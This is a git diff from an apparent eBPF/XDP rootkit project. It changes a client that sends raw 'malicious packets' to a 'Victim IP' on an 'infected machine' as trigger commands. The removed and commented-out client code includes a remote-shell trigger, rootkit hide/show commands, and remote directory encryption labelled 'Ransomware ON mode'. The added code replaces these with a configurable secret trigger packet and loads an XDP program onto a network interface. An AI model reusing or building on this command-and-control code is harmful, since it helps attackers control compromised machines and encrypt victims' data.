diff --git a/src/.output/xdp_filter.bpf.o b/src/.output/xdp_filter.bpf.o index e57c712..685b31d 100644 Binary files a/src/.output/xdp_filter.bpf.o and b/src/.output/xdp_filter.bpf.o differ diff --git a/src/.output/xdp_filter.o b/src/.output/xdp_filter.o index ad5af80..34d66c3 100644 Binary files a/src/.output/xdp_filter.o and b/src/.output/xdp_filter.o differ diff --git a/src/.output/xdp_filter.skel.h b/src/.output/xdp_filter.skel.h index 3e3a67c..94a762d 100644 --- a/src/.output/xdp_filter.skel.h +++ b/src/.output/xdp_filter.skel.h @@ -199,18 +199,18 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj) \x74\x2e\x31\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\x6e\x73\x65\0\x9f\ \xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x4c\x01\0\0\x60\x01\0\0\0\0\0\ \0\x08\0\0\0\x75\0\0\0\x01\0\0\0\0\0\0\0\x07\0\0\0\x10\0\0\0\x75\0\0\0\x14\0\0\ -\0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xc4\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xcc\ -\0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xd8\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\ -\x29\xd4\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x14\x01\0\x50\0\0\0\x7e\0\0\0\ -\x4d\x01\0\0\x09\x14\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x30\x01\0\x98\0\ -\0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x4c\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\ -\x4c\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x64\x01\0\xd0\0\0\0\x7e\0\0\0\ -\xf7\x01\0\0\x0d\x90\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\xe0\0\ -\0\0\x7e\0\0\0\x23\x02\0\0\x01\xcc\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\ -\x90\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\0\x01\0\0\x7e\0\0\0\ -\xf7\x01\0\0\x0d\x90\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x10\ -\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\ -\x0d\x90\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\x9c\x01\0\0\0\0\0\0\0\0\0\ +\0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xcc\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xd4\ +\0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xe0\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\ +\x29\xdc\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x1c\x01\0\x50\0\0\0\x7e\0\0\0\ +\x4d\x01\0\0\x09\x1c\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x38\x01\0\x98\0\ +\0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x54\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\ +\x54\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x6c\x01\0\xd0\0\0\0\x7e\0\0\0\ +\xf7\x01\0\0\x0d\x98\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\xe0\0\ +\0\0\x7e\0\0\0\x23\x02\0\0\x01\xd4\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\ +\x98\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\0\x01\0\0\x7e\0\0\0\ +\xf7\x01\0\0\x0d\x98\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\x10\ +\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\ +\x0d\x98\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\xa4\x01\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa4\0\0\0\0\0\x02\0\0\x01\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\x87\0\0\0\0\0\x02\0\xe8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x80\ \0\0\0\0\0\x02\0\xe0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\x04\0\0\0\0\ diff --git a/src/bin/xdp_filter b/src/bin/xdp_filter index e8dc90a..4d2d843 100755 Binary files a/src/bin/xdp_filter and b/src/bin/xdp_filter differ diff --git a/src/client/client.c b/src/client/client.c index db3bd77..0d262ad 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -9,6 +9,8 @@ #include #include +#include "../constants/constants.h" + // For printing with colors #define KGRN "\x1B[32m" #define KYLW "\x1B[33m" @@ -75,7 +77,7 @@ char* getLocalIpAddress(){ } -void get_shell(char* argv){ +/*void get_shell(char* argv){ char* local_ip = getLocalIpAddress(); printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); check_ip_address_format(argv); @@ -114,13 +116,13 @@ void get_shell(char* argv){ } free(local_ip); -} +}*/ -void show_rootkit(char* argv){ +void send_secret_packet(char* argv){ char* local_ip = getLocalIpAddress(); printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_SHOW_ROOTKIT"); + packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, SECRET_PACKET_PAYLOAD); printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); //Sending the malicious payload if(rawsocket_send(packet)<0){ @@ -131,61 +133,6 @@ void show_rootkit(char* argv){ free(local_ip); } -void hide_rootkit(char* argv){ - char* local_ip = getLocalIpAddress(); - printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); - check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_HIDE_ROOTKIT"); - printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); - //Sending the malicious payload - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n"); - }else{ - printf("["KGRN"OK"RESET"]""Request to hide successfully sent!\n"); - } - free(local_ip); -} - -void encrypt_directory(char* argv, char* dir){ - char* local_ip = getLocalIpAddress(); - printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); - printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir); - char data_buffer[1024]; - strcpy(data_buffer, "UMBRA_ENCRYPT_DIR"); - strcat(data_buffer, dir); - check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer); - printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); - //Sending the malicious payload - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n"); - }else{ - printf("["KGRN"OK"RESET"]""Request to encrypt directory successfully sent!\n"); - } - free(local_ip); -} - -void decrypt_directory(char* argv, char* dir){ - char* local_ip = getLocalIpAddress(); - printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); - printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir); - char data_buffer[1024]; - strcpy(data_buffer, "UMBRA_DECRYPT_DIR"); - strcat(data_buffer, dir); - check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer); - printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); - //Sending the malicious payload - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n"); - }else{ - printf("["KGRN"OK"RESET"]""Request to decrypt directory successfully sent!\n"); - } - free(local_ip); -} - - - void main(int argc, char* argv[]){ if(argc<2){ @@ -214,7 +161,7 @@ void main(int argc, char* argv[]){ printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n"); //printf("Option S has argument %s\n", optarg); strcpy(dest_address, optarg); - get_shell(dest_address); + send_secret_packet(dest_address); PARAM_MODULE_ACTIVATED = 1; break; @@ -272,20 +219,7 @@ void main(int argc, char* argv[]){ } } - //Checking activated mode, for those requiring multiple args - if(ENCRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){ - print_welcome_message(); - sleep(1); - //Selecting encrypt directory - Ransomware ON mode - printf("["KBLU"INFO"RESET"]""Selected ENCRYPT a rootkit remotely\n"); - encrypt_directory(dest_address, path_arg); - }else if(DECRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){ - print_welcome_message(); - sleep(1); - //Selecting encrypt directory - Ransomware ON mode - printf("["KBLU"INFO"RESET"]""Selected DECRYPT a rootkit remotely\n"); - decrypt_directory(dest_address, path_arg); - }else if(PARAM_MODULE_ACTIVATED==0){ + if(PARAM_MODULE_ACTIVATED==0){ printf("["KRED"ERROR"RESET"]""Invalid parameters\n"); print_help_dialog(argv[0]); exit(EXIT_FAILURE); diff --git a/src/client/client.o b/src/client/client.o index ef68732..fbabbf6 100644 Binary files a/src/client/client.o and b/src/client/client.o differ diff --git a/src/client/injector b/src/client/injector index 05c0512..456fb88 100755 Binary files a/src/client/injector and b/src/client/injector differ diff --git a/src/constants/constants.h b/src/constants/constants.h new file mode 100644 index 0000000..c75db68 --- /dev/null +++ b/src/constants/constants.h @@ -0,0 +1,6 @@ +#ifndef __CONSTANTS_H +#define __CONSTANTS_H + +#define SECRET_PACKET_PAYLOAD "test" + +#endif \ No newline at end of file diff --git a/src/ebpf/xdp_filter.bpf.c b/src/ebpf/xdp_filter.bpf.c index b25af0d..7b787e3 100644 --- a/src/ebpf/xdp_filter.bpf.c +++ b/src/ebpf/xdp_filter.bpf.c @@ -14,13 +14,15 @@ #include #include #include -#include "../user/xdp_filter.h" #include #include #include #include #include +#include "../user/xdp_filter.h" +#include "../constants/constants.h" + char LICENSE[] SEC("license") = "Dual BSD/GPL"; diff --git a/src/user/xdp_filter.c b/src/user/xdp_filter.c index 6a0aef6..5930a4d 100644 --- a/src/user/xdp_filter.c +++ b/src/user/xdp_filter.c @@ -5,50 +5,32 @@ #include #include #include +#include +#include + #include "xdp_filter.skel.h" #include "xdp_filter.h" -#include +#include "../constants/constants.h" static struct env { bool verbose; } env; -const char *argp_program_version = "xdp_filter 0.1"; -const char *argp_program_bug_address = ""; -const char argp_program_doc[] = -"My first eBPF packet filter using Express Data Path (XDP)\n" -"\n" -"TODO DESCRIPTION\n" -"\n" -"USAGE: ./xdp_filter [-v]\n"; +void print_help_dialog(const char* arg){ + printf("\nUsage: %s ./xdp_filter OPTION\n\n", arg); + printf("Program OPTIONs\n"); + char* line = "-t[NETWORK INTERFACE]"; + char* desc = "Activate XDP filter"; + printf("\t%-40s %-50s\n\n", line, desc); + line = "-v"; + desc = "Verbose mode"; + printf("\t%-40s %-50s\n\n", line, desc); + line = "-h"; + desc = "Print this help"; + printf("\t%-40s %-50s\n\n", line, desc); -/*Options for argp*/ -static const struct argp_option opts[] = { - { "verbose", 'v', NULL, 0, "Verbose debug output" }, - {}, -}; - -/*Command argument parsing, similar to getopt*/ -static error_t parse_arg(int key, char *arg, struct argp_state *state){ - switch (key) { - case 'v': - env.verbose = true; - break; - case ARGP_KEY_ARG: - argp_usage(state); - break; - default: - return ARGP_ERR_UNKNOWN; - } - return 0; } -static const struct argp argp = { - .options = opts, - .parser = parse_arg, - .doc = argp_program_doc, -}; - /*Wrapper for printing into stderr when debug active*/ static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args){ if (level == LIBBPF_DEBUG && !env.verbose) @@ -100,79 +82,93 @@ int main(int argc, char**argv){ struct xdp_filter_bpf *skel; int err; - unsigned int ifindex = if_nametoindex(argv[1]); + unsigned int ifindex; /* Parse command line arguments */ - /*err = argp_parse(&argp, argc, argv, 0, NULL, NULL); - if (err) - return err;*/ + int opt; + while ((opt = getopt(argc, argv, ":t:vh")) != -1) { + switch (opt) { + case 't': + ifindex = if_nametoindex(optarg); + printf("Activating filter on network interface: %s\n", optarg); + if(ifindex == 0){ + perror("Error on input interface"); + exit(EXIT_FAILURE); + } + break; + case 'v': + //Verbose output + env.verbose = true; + break; - /* Set up libbpf errors and debug info callback */ + case 'h': + print_help_dialog(argv[0]); + exit(0); + break; + case '?': + printf("Unknown option: %c\n", optopt); + exit(EXIT_FAILURE); + break; + case ':': + printf("Missing arguments for %c\n", optopt); + exit(EXIT_FAILURE); + break; + + default: + print_help_dialog(argv[0]); + exit(EXIT_FAILURE); + } + } + + // Set up libbpf errors and debug info callback libbpf_set_print(libbpf_print_fn); - /* Bump RLIMIT_MEMLOCK to create BPF maps */ + // Bump RLIMIT_MEMLOCK to be able to create BPF maps bump_memlock_rlimit(); - /* Cleaner handling of Ctrl-C */ + // Cleaner handling of Ctrl-C signal(SIGINT, sig_handler); signal(SIGTERM, sig_handler); - /* Load and verify BPF application */ + // Load and verify BPF application skel = xdp_filter_bpf__open(); if (!skel) { fprintf(stderr, "Failed to open and load BPF skeleton\n"); return 1; } - /* Load & verify BPF programs */ + // Load & verify BPF programs */ err = xdp_filter_bpf__load(skel); if (err) { fprintf(stderr, "Failed to load and verify BPF skeleton\n"); goto cleanup; } - /* Attach tracepoints */ - err = xdp_filter_bpf__attach(skel); + // Attach tracepoints + /*err = xdp_filter_bpf__attach(skel); if (err) { fprintf(stderr, "Failed to attach BPF skeleton\n"); goto cleanup; - } - - int flags = XDP_FLAGS_SKB_MODE; - int fd = bpf_program__fd(skel->progs.xdp_receive); - - err = bpf_set_link_xdp_fd(ifindex, fd, flags); - - /* Set up ring buffer polling */ - /*rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); - if (!rb) { - err = -1; - fprintf(stderr, "Failed to create ring buffer\n"); - goto cleanup; }*/ - /* Process events */ - printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + //Attack BPF program to network interface + int flags = XDP_FLAGS_SKB_MODE; + int fd = bpf_program__fd(skel->progs.xdp_receive); + err = bpf_set_link_xdp_fd(ifindex, fd, flags); + + printf("Filter set and ready\n"); while (!exiting) { - //err = ring_buffer__poll(rb, 100 /* timeout, ms */); - /* Ctrl-C will cause -EINTR */ - if (err == -EINTR) { - err = 0; - break; - } - if (err < 0) { - printf("Error polling perf buffer: %d\n", err); - break; - } + /* trigger our BPF program */ + fprintf(stderr, "."); + sleep(1); } + //Received signal to stop, detach program from network interface fd = -1; err = bpf_set_link_xdp_fd(ifindex, fd, flags); + cleanup: - /* Clean up */ - //ring_buffer__free(rb); xdp_filter_bpf__destroy(skel); return err < 0 ? -err : 0;